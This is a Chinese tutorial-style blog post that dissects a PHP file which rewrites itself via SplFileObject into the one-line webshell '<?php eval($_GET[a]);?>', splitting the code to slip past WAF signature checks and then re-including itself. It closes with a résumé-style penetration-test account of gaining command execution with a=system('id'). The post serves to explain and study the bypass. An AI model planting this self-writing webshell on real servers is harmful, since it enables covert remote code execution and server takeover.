bypass

代码解析

修改自身bypass:

第一句话

$s="Declaring file object\n";

定义一个s,值为Declaring file object

第二句话

d=_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];

不知道$_SERVER是什么,那就打印出来看看。输入

echo '<pre>';

print_r($_SERVER);

打印出:

可知:

//$_SERVER['DOCUMENT_ROOT'] 获取的是:/usr/local/nginx/html

//$_SERVER['DOCUMENT_URI'] 获取的是:/bypass/5.php

. 在php中是拼接的意思,既这句话的意思是定义一个d,他的值是: /uSr/local/nginx/html/bypass/demO2.php

第三句话

file = new SplFileObject(d,'w');

提供一个函数SplFileObject,查官方文档得知:

::,两个冒号是静态方法。当去new一个类的时候,构造函数会自动执行。

$file = new SplFileObject("fwrite.txt", "w");

  • 这是创建一个新的文件对象(使用的是 PHP 的 SplFileObject 类)。

  • "fwrite.txt" 是文件名,如果不存在就会创建它。

  • "w" 是打开模式,表示:

    • 打开用于写入,

    • 如果文件存在,将会清空原内容;

    • 如果文件不存在,会尝试创建一个新文件。

$written = $file->fwrite("12345");
  • 使用 fwrite() 方法向文件写入字符串 "12345"

  • 写入成功后,返回值是写入的字节数这里是 5

  • "12345"为想写入的内容

所以第三局话的意思是:定义一个file,他的值为新的一个类(SplFileObject),这个类的作用是往d写入内容。

第四句话

file-\>fwrite("\s[3]);

调用fwrite写入内容,$s[3]的意思是调用第一句话的第3个字母"l",把l取出来,那么这句话的意思是:写入<?php eval到此没完,因为一句话木马没写完

第五句话

file-\>fwrite("(\\_"."GET"."[a]);?>");

继续写入。因为是定义变量的前缀,所以要在前面加一个转义字符\\,把_变为普通的符号。这句话的意思是:(_GET[a]);?>

一执行5.php就会改头换面变为:<?php eval($_GET[a]);?>

第六句话

include(get_included_files()[0]);

get_included_files()

  • 这是 PHP 的一个内置函数。

  • 它返回一个 数组 ,包含当前脚本中所有通过 includerequireinclude_oncerequire_once 加载过的文件名

  • 每个元素是一个绝对路径

  • 下标 0当前正在执行的主脚本本身的路径

表示的就是当前 PHP 脚本的完整路径名:/usr/local/nginx/html/bypass/5.php

include(...)

  • include 的作用是把某个 PHP 文件里的代码**"嵌入并执行"**到当前位置。

  • 相当于重新执行当前脚本

此时5.php完全变了。变为:

看似合理无害的文件,变为了一句话木马。在上传时waf并未认定是恶意文件,那是在运行的时候,改变了自身的属性。

写成项目经历:

这个项目是我在做 Web 渗透测试时发现的一类漏洞利用方法,重点是通过 PHP 的自写入和自身包含机制,绕过常规的安全防护,实现远程代码执行。

当时目标系统用了 PHP,目录权限不算严格,用户上传文件后可以被 Web 访问。起初发现系统对 eval() 函数和常规 WebShell 特征做了过滤,比如直接上传 <?php eval($_GET['a']); ?> 这类代码会被拦截或者清除。

后来我尝试换思路,通过 PHP 的 SplFileObject 类创建当前脚本的文件对象(也就是_SERVER\['DOCUMENT_URI'\] 加上 _SERVER['DOCUMENT_ROOT'] 得到的路径),然后动态拼接写入一句类似 <?php eval(_GET\['a'\]); ?\> 的代码,但故意打散写法,避开特征检测。比如把 eval 拆成 "eva".s[3](s\[3\] 是 "l"),把变量写成 \\_GET["a"],这样即使是代码审计工具或者 Web 应用防火墙(WAF)也不太容易识别。

写完后,再用 include(get_included_files()[0]); 重新加载当前脚本,就会立即执行刚写进去的恶意代码。然后我访问这个文件并传入 a=phpinfo(); 或 a=system('id');,就能执行任意命令,拿到服务器权限。

这个过程可以实现绕过上传限制、绕过 WAF 特征识别、绕过禁用函数控制,属于一个组合型的 RCE 利用链。后面我把这套方法写成了利用脚本,并整理成报告提交给了客户方,得到了他们的高度重视,也推动了他们修改相关目录权限和配置。

在这个项目里,我主要负责漏洞挖掘、利用方式设计以及后续的复现与验证,另外还参与了编写报告和向客户讲解复现方式。

赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞赞点点。

相关推荐
郭二哈2 分钟前
应⽤层协议HTTP
网络·网络协议·http
爱玩电脑的L18 分钟前
网络原理 - TCP/IP
网络·网络协议·tcp/ip
Yama11726 分钟前
IPSEC 之单臂部署
网络·智能路由器
scd02082 小时前
ospf笔记和 综合实验册
网络·智能路由器·hcip
集成显卡4 小时前
网络安全 | 从 0 到 1 了解 WAF:Web 应用防火墙到底是什么?
网络·安全·web安全
Jewel Q4 小时前
TCP为什么采用三次握手而不是二次握手
服务器·网络·tcp/ip
lihongli0005 小时前
消息系统技术文档
网络·unity·游戏引擎
Moso_Rx6 小时前
HTTP基本结构
网络·网络协议·http
千码君20166 小时前
计算机网络:网络号和网络地址的区别
网络·计算机网络·子网掩码·网络地址·网络号·主机号